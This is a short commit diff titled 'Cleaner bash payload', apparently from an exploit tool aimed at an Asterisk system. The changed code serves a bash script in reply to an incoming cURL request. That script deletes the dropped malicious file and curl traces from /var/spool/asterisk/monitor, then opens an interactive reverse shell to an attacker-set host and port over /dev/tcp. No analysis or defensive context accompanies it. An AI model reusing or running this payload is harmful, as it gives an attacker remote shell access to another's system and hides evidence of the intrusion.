Cleaner bash payload
This commit is contained in:
@@ -724,11 +724,11 @@ class Exploit:
|
||||
self.custom_print(
|
||||
f"Received cURL request from {incoming_address[0]}", "+"
|
||||
)
|
||||
exploit_script = f"#!/bin/bash\n"
|
||||
exploit_script += (
|
||||
exploit_script = (
|
||||
f"#!/bin/bash\n"
|
||||
f"rm {self.MALICIOUS_FILENAME} /var/spool/asterisk/monitor/*curl*\n"
|
||||
f"bash -i >& /dev/tcp/{self.REVERSE_SHELL_HOST}/{self.REVERSE_SHELL_PORT} 0>&1\n"
|
||||
)
|
||||
exploit_script += f"bash -i >& /dev/tcp/{self.REVERSE_SHELL_HOST}/{self.REVERSE_SHELL_PORT} 0>&1\n"
|
||||
|
||||
http_response = f"HTTP/1.1 200 OK\r\n"
|
||||
http_response += f"Content-Length: {len(exploit_script)}\r\n\r\n"
|
||||
|
||||
Reference in New Issue
Block a user